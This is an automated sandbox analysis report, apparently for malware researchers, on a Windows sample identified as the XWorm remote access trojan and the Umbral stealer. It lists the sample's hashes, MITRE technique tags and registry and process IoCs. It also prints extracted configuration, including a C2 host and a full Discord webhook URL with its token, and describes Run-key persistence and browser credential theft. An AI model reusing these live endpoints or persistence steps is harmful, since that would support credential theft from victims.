umbral | 6060fb48cc4a123bb9a64f8854f8c5253dc125194469f2e4b0821d4248f14c3c

Analysis

max time kernel
569s
max time network
588s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
25-02-2024 05:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IO tootls.exe
Size

207KB
MD5

5afd3e0ac701a47f48772af3c5eb54d1
SHA1

ac20c5db48d258c9f00845fb3508e90d4f3187ae
SHA256

6060fb48cc4a123bb9a64f8854f8c5253dc125194469f2e4b0821d4248f14c3c
SHA512

24329cf850d5578c13799f093394c619ece7c0ba36a79fc57084e9c1da38d119e39bc27e5e91de12c1426bf1fe7131060ce3a20fc566d90525a99e4da914337b
SSDEEP

6144:rJX6OJ0PS7eEcJWIUPjw7B5oZKH4FIlhuc4w1VVcKGwO9t:94SqE4q7coY4ShucV43

Score

10^/10

umbral xworm persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

hai1723rat-60039.portmap.io:60039

Extracted

Family

umbral

https://discord.com/api/webhooks/1211176678466916392/99VOwP9dc7iQz2Is-QlZ872KZaiUa4r3sEvXqZ6NmS-fFuTojiUjOg2SjIUWBCIoPNFA

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000700000001abe2-47.dat	family_umbral
behavioral2/memory/4460-48-0x000001F00E810000-0x000001F00E85E000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000700000001abe0-37.dat	family_xworm
behavioral2/memory/3412-42-0x00000000004B0000-0x00000000004D6000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	controllloader.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Control Panel\International\Geo\Nation	systemload.exe

Executes dropped EXE 2 IoCs

pid	Process
3412	systemload.exe
4460	controllloader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Windows\CurrentVersion\Run\updatee = "C:\\Windows\\.NET\\netloader.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
11	discord.com
12	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	systemload.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4620 set thread context of 2352	4620	IO tootls.exe	77

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\.NET\netloader.exe	IO tootls.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3864	wmic.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 1697f365b167da01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c4ce1e7bb167da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz!	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

pid	Process
4620	IO tootls.exe
4620	IO tootls.exe
1564	powershell.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
2352	IO tootls.exe
1564	powershell.exe
1564	powershell.exe
3676	powershell.exe
3676	powershell.exe
4648	powershell.exe
3676	powershell.exe
4648	powershell.exe
4648	powershell.exe
1716	powershell.exe
1716	powershell.exe
1716	powershell.exe
1716	powershell.exe
2524	powershell.exe
3436	powershell.exe
2524	powershell.exe
3436	powershell.exe
2524	powershell.exe
3436	powershell.exe
3436	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
3412	systemload.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
2280	powershell.exe
2280	powershell.exe
2280	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1496	MicrosoftEdgeCP.exe
1496	MicrosoftEdgeCP.exe
1496	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4620	IO tootls.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	2352	IO tootls.exe
Token: SeDebugPrivilege	4460	controllloader.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	3412	systemload.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeIncreaseQuotaPrivilege	3676	powershell.exe
Token: SeSecurityPrivilege	3676	powershell.exe
Token: SeTakeOwnershipPrivilege	3676	powershell.exe
Token: SeLoadDriverPrivilege	3676	powershell.exe
Token: SeSystemProfilePrivilege	3676	powershell.exe
Token: SeSystemtimePrivilege	3676	powershell.exe
Token: SeProfSingleProcessPrivilege	3676	powershell.exe
Token: SeIncBasePriorityPrivilege	3676	powershell.exe
Token: SeCreatePagefilePrivilege	3676	powershell.exe
Token: SeBackupPrivilege	3676	powershell.exe
Token: SeRestorePrivilege	3676	powershell.exe
Token: SeShutdownPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeSystemEnvironmentPrivilege	3676	powershell.exe
Token: SeRemoteShutdownPrivilege	3676	powershell.exe
Token: SeUndockPrivilege	3676	powershell.exe
Token: SeManageVolumePrivilege	3676	powershell.exe
Token: 33	3676	powershell.exe
Token: 34	3676	powershell.exe
Token: 35	3676	powershell.exe
Token: 36	3676	powershell.exe
Token: SeIncreaseQuotaPrivilege	1716	powershell.exe
Token: SeSecurityPrivilege	1716	powershell.exe
Token: SeTakeOwnershipPrivilege	1716	powershell.exe
Token: SeLoadDriverPrivilege	1716	powershell.exe
Token: SeSystemProfilePrivilege	1716	powershell.exe
Token: SeSystemtimePrivilege	1716	powershell.exe
Token: SeProfSingleProcessPrivilege	1716	powershell.exe
Token: SeIncBasePriorityPrivilege	1716	powershell.exe
Token: SeCreatePagefilePrivilege	1716	powershell.exe
Token: SeBackupPrivilege	1716	powershell.exe
Token: SeRestorePrivilege	1716	powershell.exe
Token: SeShutdownPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeSystemEnvironmentPrivilege	1716	powershell.exe
Token: SeRemoteShutdownPrivilege	1716	powershell.exe
Token: SeUndockPrivilege	1716	powershell.exe
Token: SeManageVolumePrivilege	1716	powershell.exe
Token: 33	1716	powershell.exe
Token: 34	1716	powershell.exe
Token: 35	1716	powershell.exe
Token: 36	1716	powershell.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeIncreaseQuotaPrivilege	3436	powershell.exe
Token: SeSecurityPrivilege	3436	powershell.exe
Token: SeTakeOwnershipPrivilege	3436	powershell.exe
Token: SeLoadDriverPrivilege	3436	powershell.exe
Token: SeSystemProfilePrivilege	3436	powershell.exe
Token: SeSystemtimePrivilege	3436	powershell.exe
Token: SeProfSingleProcessPrivilege	3436	powershell.exe
Token: SeIncBasePriorityPrivilege	3436	powershell.exe
Token: SeCreatePagefilePrivilege	3436	powershell.exe
Token: SeBackupPrivilege	3436	powershell.exe
Token: SeRestorePrivilege	3436	powershell.exe
Token: SeShutdownPrivilege	3436	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3412	systemload.exe
2448	MicrosoftEdge.exe
1496	MicrosoftEdgeCP.exe
3704	MicrosoftEdgeCP.exe
1496	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 4620 wrote to memory of 1564	4620	IO tootls.exe	74
PID 4620 wrote to memory of 1564	4620	IO tootls.exe	74
PID 4620 wrote to memory of 1564	4620	IO tootls.exe	74
PID 4620 wrote to memory of 308	4620	IO tootls.exe	76
PID 4620 wrote to memory of 308	4620	IO tootls.exe	76
PID 4620 wrote to memory of 308	4620	IO tootls.exe	76
PID 4620 wrote to memory of 2352	4620	IO tootls.exe	77
PID 4620 wrote to memory of 2352	4620	IO tootls.exe	77
PID 4620 wrote to memory of 2352	4620	IO tootls.exe	77
PID 4620 wrote to memory of 2352	4620	IO tootls.exe	77
PID 4620 wrote to memory of 2352	4620	IO tootls.exe	77
PID 4620 wrote to memory of 2352	4620	IO tootls.exe	77
PID 4620 wrote to memory of 2352	4620	IO tootls.exe	77
PID 4620 wrote to memory of 2352	4620	IO tootls.exe	77
PID 2352 wrote to memory of 3412	2352	IO tootls.exe	78
PID 2352 wrote to memory of 3412	2352	IO tootls.exe	78
PID 2352 wrote to memory of 4460	2352	IO tootls.exe	79
PID 2352 wrote to memory of 4460	2352	IO tootls.exe	79
PID 2352 wrote to memory of 2412	2352	IO tootls.exe	80
